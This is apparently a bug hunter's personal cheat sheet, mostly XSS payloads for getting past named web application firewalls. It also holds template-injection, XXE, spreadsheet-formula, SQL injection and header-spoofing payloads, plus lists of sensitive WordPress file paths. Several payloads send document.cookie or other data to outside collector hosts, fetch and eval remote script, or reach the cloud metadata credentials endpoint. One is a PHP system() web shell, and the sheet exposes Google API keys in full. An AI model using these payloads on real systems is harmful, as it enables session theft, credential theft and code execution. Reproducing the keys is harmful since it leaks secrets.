XSS Notes

EICARdropper

https://thecyberpunker.com/blog/xss-payloads/

https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/

.*\.doit\.com$

https://translation.googleapis.com/language/translate/v2?key=AIzaSyBdJ88HN7LTGk1
2X5whfaVv8a5ozTEMP_k&target=language

https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=AIzaSyC5Lai
ovNX0mzDrDlOoLEKWCH2EWOSQohg

--------------------------------------------------------------------------------------------------------------

Most Important XSS Payloads for WAF Bypass

--------------------------------------------------------------------------------------------------------------

Test<a href=javascript:alert(1)>click<a %00 src=\"&Tab;javascript:prompt(document.cookie)&Tab;\"%00onclick=alert(1)> fooo

ASP.NET payloads, by @shrekysec

/(A('onerror=%22alert%601%60%22testabcd))/

/Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders

(A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f

"></SCRIPT>--!><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>%27}};">});});})]--

Bypass Filter JavaScript source code

--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101))</SCRIPT>
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--
></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

<button onClick={() => router.push("javascript:(alert)(3)")}>Click</button>

i2lte%22%3e%3cscript%3ealert(1)%3c%2fscript%3eayawz

<A/HRef=javascript:top/**/?.['ale'%2B'rt'](1)>

<</div>script</div>>confirm()<</div>/script</div>>

<svg/onload=window["al"+"ert"]`1337`>

<img src="image.png" usermap="#themap" width="99" height="99"><map name="themap"><area coords="0,0,99,99" href="javascript:alert(1337)"></map>

<iframe src="javascript:setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](document.domain)/*\*/ }, 5000);"></inpuT%3E;>

<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](document.domain)/*\*/ }, 5000);"></inpuT%3E;>

1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>


<!--
><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>

<div onpointerover="ja&#x76;ascr&#x69;pt:eva&#x6C;(decodeURICompo&#110;ent(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div>

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//

<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">

<video><source onerror="alert.constructor.constructor('return this')().alert('0f')">

<EMBED SRC="data:image/svg+xml;base64,PHN2Zy9vbmxvYWQ9d2luZG93WyJhbCIrImVydCJdYDEzMzdgPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<option><style></option></select><img src=x onerror=alert(1)></style>

<Svg Only=1 OnLoad=confirm(1)>

<input/onclick=alert(1)>

{{constructor.constructor('alert(document.cookie)')()}}
<image src/onerror=alert("Contact_Name")>

javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click me</button><hvita onbeforetoggle=+a+b+c+ popover id=x>Hvita</hvita>")

<a href=\"javascript:alert(document.domain)\" onClick=\"var a =\"}, var a=5; prompt(7);function a(){var b={c: {d:{//\"\">Click Me</a>

<A href=javascript:alert(1)>asd

<script>alert()<\/script>

"/><img src=u onerror="alert(document.domain)"<

<details ontoggle=alert(1)>

<a href="data:text/html,<script>alert(1)</script>">Click Here</a>

<a target="_blank" href="mailto:bar"onclick="alert(1)"<script>alert(1)</script> onhower=alert(2)>Safe</a>

<p><a href="mailto:<svg/onload="alert(1)"//@x"><svg/onload="alert(1)"//@x</a></p>

<a target="_blank" href="data:text/URI,javascript:alert(window.opener.document.cookie);">test</a>

<svg/onload=alert(/1/)>
<svg/on<script>load=prompt(document.domain);>"/>

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open('GET','file:///etc/hosts');x.send();</script>

<noscript>&amp;lt;p title=" &lt;/noscript&gt;&lt;style onload=alert(document.domain)//&quot;&gt; *{/*all*/color/*all*/:/*all*/#f78fb3/*all*/;} &lt;/style&gt;

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;onclick=alert(1)">Click me</a>

<script>history.pushState(0,0,'/i/am/somewhere_else');</script><iframe onload="javascript:alert(document.domain)">

<body onload="javascript:location.replace('\x2fportal\x2fc');">

--------------------------------------------------------------------------------------------------------------

Akamai Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------

<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;>

<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>

<svg><circle><set onbegin=prompt(1) attributename=fill>

<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

"%3balert`1`%3b"
asd"`> onpointerenter=x=prompt,x`XSS`

<x onauxclick=import('//1152848220/')>click

<x onauxclick=a=alert,a(domain)>click

<x onauxclick=import('//xss/')>click

\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss

{{constructor.constructor(alert`1`)()}}

javascript:new%20Function`al\ert\`1\``;

https://twitter.com/xhzeem/status/1378316651431612422

https://twitter.com/xhzeem/status/1377992310974218245

<script>Object.prototype.BOOMR = 1;Object.prototype.url='https://portswigger-labs.net/xss/xss.js'</script> - https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click

--------------------------------------------------------------------------------------------------------------

Cloudflare Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------

<a"/onclick=(confirm)()>Click Here!

Dec: <svg onload=prompt%26%230000000040document.domain)>

Hex: <svg onload=prompt%26%23x000000028;document.domain)>

xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>

<--%253cimg%20onerror=alert(1)%20src=a%253e --!>

<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>

javascript:{ alert`0` }

1'"><img/src/onerror=.1|alert``>

<img src=x onError=import('//1152848220/')>

%2sscript%2ualert()%2s/script%2u

<svg on onload=(alert)(document.domain)>

<img ignored=() src=x onerror=prompt(1)>

<svg onx=() onload=(confirm)(1)>

"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;

<svg on =i onload=alert(domain)

<svg/onload=location/**/='https://your.server/'+document.domain>

<svg onx=() onload=window.alert?.()>

test",prompt%0A/*HelloWorld*/(document.domain)

"onx+%00+onpointerenter%3dalert(domain)+x"

"><svg%20onload=alert%26%230000000040"1")>

%27%09);%0d%0a%09%09[1].find(alert)//

"><img src=1 onmouseleave=print()>

<svg/on%20onload=alert(1)> (working)

<img/src=x onError="`${x}`;alert(`Ex.Mi`);">

--------------------------------------------------------------------------------------------------------------

CloudFront Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------

">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>

">'><details/open/ontoggle=confirm('XSS')>

6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/

&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;

--------------------------------------------------------------------------------------------------------------

Imperva Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------

<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme

tarun"><x/onafterscriptexecute=confirm%26lpar;)//

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

<svg onload\r\n=$.globalEval("al"+"ert()");>

<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click

<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />tap

--------------------------------------------------------------------------------------------------------------

Incapsula Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>

<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">

<audio autoplay onloadstart=this.src='hxxps://msf.fun/?c='+document["cook"+"ie"]' src=x>

<img/src=q onerror='new Function`al\ert\`1\``'>

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>

<svg onload\r\n=$.globalEval("al"+"ert()");>

[1].map(alert) or (alert)(1)

<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-tarun/&rpar;">XXXXX</a>

[1].find(confirm)

<svg/onload=self[`aler`%2b`t`]`1`>

%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E

'-[document.domain].map(alert)-'

--------------------------------------------------------------------------------------------------------------

Wordfence Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------

ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6

<meter onmouseover="alert(1)" -@manjith27945363

'">><div><meter onmouseover="alert(1)"</div>"

>><marquee loop=1 width=0 onfinish=alert(1)>

Wordfence 7.4.2

<a href=&#01javascript:alert(1)>

<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20click%20here</a>

--------------------------------------------------------------------------------------------------------------

For Slack

--------------------------------------------------------------------------------------------------------------

'"<b oncut=alert(3)>asd</b>>

slack '"><sript>var a= 4;</script> test '"><script>var a =1; </script>

'"><img src=u onerror=alert(21)>

<script>alert(1)</script>

'"><b>ssss<a href="google.com">ssss</a><img/src='u'/onerror=alert(7777)>
'"><b>ss<a href="google.com">ssss</a><img/src='u'/onerror=alert()>

"'><img src=u onerror=alert(1)>

<a href="https://www.google.com">Q1</a>

[click here](https://www.google.com"+onclick=alert(1)

--------------------------------------------------------------------------------------------------------------

Random Payloads

--------------------------------------------------------------------------------------------------------------

test1 <a href="data:text/html,<script>alert(1)</script>">Click Here</a>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"

<script/src=data:,alert()>

<marquee/onstart=alert()>

<video/poster/onerror=alert()>

<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<a onmouseover="alert(document.cookie)">xxs link</a>

<a onmouseover=alert(document.cookie)>xxs link</a>


<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=# onmouseover="alert('xxs')">

<IMG SRC= onmouseover="alert('xxs')">

<IMG onmouseover="alert('xxs')">

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

<IMG SRC=" &#14; javascript:alert('XSS');">

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

<SCRIPT SRC=//ha.ckers.org/.j>

<IMG SRC="javascript:alert('XSS')"

<iframe src=http://ha.ckers.org/scriptlet.html <

\";alert('XSS');//

</script><script>alert('XSS');</script>

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

<IMG SRC='vbscript:msgbox("XSS")'>

<IMG SRC="livescript:[code]">

<BODY ONLOAD=alert('XSS')>

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

exp/*<A STYLE='no\xss:noxss("*//*");

xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<XSS STYLE="xss:expression(alert('XSS'))">

<XSS STYLE="behavior: url(xss.htc);">

¼script¾alert(¢XSS¢)¼/script¾

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

<DIV STYLE="width: expression(alert('XSS'));">

<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->

<BASE HREF="javascript:alert('XSS');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>

<IMG SRC="https://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<A HREF="http://66.102.7.147/">XSS</A>

veris-->group<svg/onload=alert(/XSS/)//

#"><img src=M onerror=alert('XSS');>

element[attribute='<img src=x onerror=alert('XSS');>

[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]

%22;alert%28%27RVRSH3LL_XSS%29//

javascript:alert%281%29;

<w contenteditable id=x onfocus=alert()>

alert;pg("XSS")

<svg/onload=%26%23097lert%26lpar;1337)>

<script>for((i)in(self))eval(i)(1)</script>

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>

<sCR<script>iPt>alert(1)</SCr</script>IPt>

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>

Vue.js

{{$emit.constructor`fetch(%27https://8v4y3qmogobk2g6bewqtqa83quwkk9.oastify.com%27,%20{%20method:%20%27POST%27,%20mode:%20%27no-cors%27,%20body:%20document.cookie%20});`()}}

{{$emit.constructor`function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//xss.report/s/sid0krypt");a.send()`()}}

{{_Vue.h.constructor('x','console.log("HI this is sid0krypt")')(this)}}

{{_Vue.h.constructor('x','console.log(x)')(this)}}

{{_Vue.h.constructor`alert(1)`()}}

{{$emit.constructor`alert(1)`()}}

${\"zjz\".toString().replace(\"j\", \"o\")}

${'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"ping\\\",\\\"szvta3myzyhu8udxodgghh6hm8sygn.burpcollaborator.net\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}

XML External Entity (XXE) Injection

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "https://zqtb5eufvtnznrn5l4il14ajeak28swh.oastify.com" > ]><test>&xxe</test><svg xmlns="http://www.w3.org/2000/svg"><text font-size="16" x="10" y="40">%26xxe1;</text></svg>

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe1 SYSTEM "http://geysgbf5kz1xoad21xx9yqo11s7iv7.burpcollaborator.net" > ]><svg xmlns="http://www.w3.org/2000/svg"><text font-size="16" x="10" y="40">%26xxe1;</text></svg>

*********HTML Injection*********

<a href=https://www.google.com>Link</a>

<a href=https://www.google.com>SLACK</a>

<a href=https://www.google.com>Click here</a>

*********Formula Injection*********

=calc|A0!Z

@calc|A0!Z

=cmd|' /C calc'!xxx

=cmd|'/Ccalc.exe'!z

=cmd|' /C notepad'!'A1'

DDE ("cmd";"/C calc";"!A0")A0

%0A-3+3+cmd|' /C calc'!D2

*********Command Execution*********

=WEBSERVICE("http://169.254.169.254/latest/meta-data/iam/security-credentials/"),

=WEBSERVICE("http://7498qogq07az5hxtjvy2ks36ixooce03.oastify.com"),

=INFO("/etc/passwd"),

=INFO("SYSTEM"),

=INFO("OSVERSION")

*********CSRF*********
http://gursevkalra.blogspot.com/2011/12/json-csrf-with-parameter-padding.html -- JSON padding

https://www.geekboy.ninja/blog/tag/json-csrf/ -- JSON padding

Convert the JSON body to x-www-form-urlencoded:

replace ":" with "=" and "," with "&"

ASP.NET padding oracle

Check the WebResource.axd URL

Web cache poisoning

cookie language:en

cookie language:pl (400 or 403)

X-Forwarded-Host: Blueinfy

Then the same response comes back in the main request

Try in GET method

xmlrpc.php

<?xml version="1.0"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

https://kipwise.com/xmlrpc.php

<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://</string></value></param>
<param><value><string>https://kipwish.com</string></value></param>
</params>
</methodCall>

curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL

--------------------------------------------------------------------------------------------------------------

WordPress

--------------------------------------------------------------------------------------------------------------

/.htaccess

/wp-includes/

/wp-json/

/wp-content/uploads/

/wp-json/wp/v2/users

/wp-admin

/wp-admin/admin-ajax.php

/wp-json/?rest_route=/wp/v2/users/

/wp-config.php-backup /wp-config.php.orig

/.wp-config.php.swp

/wp-config-sample.php /wp-config.inc

/wp-config.old
/wp-config.txt

/wp-config.php.txt

/wp-config.php.bak

/wp-config.php.old

/wp-config.php.dist

/wp-config.php.inc

/wp-config.php.swp

/wp-config.php.html

/wp-config-backup.txt /wp-config.php.save

/wp-config.php~

/wp-config.php.original

/_wpeprivate/config.json

WordPress Elementor Website Builder plugin, versions <= 3.5.5

#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=

https://www.cvedetails.com/ -- CVSS score

{{5*5}}

{{7*7}} -- Template injection

https://autocode.com/guides/how-to-build-a-slack-bot/

x-forwarded-scheme: http

X-forwarded-host: host
X-Real-IP: 127.0.0.1

X-Client-IP: 120.0.0.1

X-Rewrite-URL: 127.0.0.1

X-Remote-IP: 127.0.0.1

X-Remote-Addr: 127.0.0.1

X-ProxyUser-Ip: 127.0.0.1

X-Originating-IP: 127.0.0.1

X-Original-URL: 127.0.0.1

X-Forwarded: 127.0.0.1

X-Forwarded-For: 127.0.0.1

X-Custom-IP-Authorization: 127.0.0.1

True-Client-IP: 127.0.0.1

Intercom ChatBot Security Misconfiguration:

Intercom('boot', { email: '[email protected]' });

HelpCrunch ChatBot Security Misconfiguration

HelpCrunch('userAuth', {user_id: '[email protected]'});

Bot Framework (Microsoft Azure)

WebChat.createDirectLine({userEmail:'[email protected]'});

https://calendar.google.com/calendar/b/1/r?cid=users_mail_address@company_name.com

https://gitlab.com/dee-see/notkeyhacks

' waitfor delay'0:0:15'--

Error based

Union based

Blind - time based and boolean based

Second-order SQL injection

UPDATE user SET password='123' WHERE username='xyz' AND password='123'

UPDATE user SET password='123' WHERE username='xyz'-- ' AND password='123'

Broken Access Control

Cryptographic Failures

Injection

Insecure Design

Security Misconfiguration

Vulnerable and Outdated Components

Identification and Authentication Failures

Software and Data Integrity Failures

Security Logging and Monitoring Failures

SSRF

<?php system(id); ?>

Firebase:

https://blog.appsecco.com/exploiting-weak-configurations-in-google-identity-platform-cbddbd0e71e3

https://hacktricks.boitatech.com.br/pentesting/pentesting-web/buckets/firebase-database

__/firebase/init.json

GET /v1alpha/projects/-/apps/1:361636954636:web:220eedf13a3a1aa0d36429/webConfig HTTP/2

Host: firebase.googleapis.com

X-Goog-Api-Key: AIzaSyB8KMna82QZS8RR9mIjO-xOzq19E4Vx-gg

If you find SSRF, see https://www.youtube.com/watch?v=apzJiaQ6a3k

Hint: `whoami`.<burp>
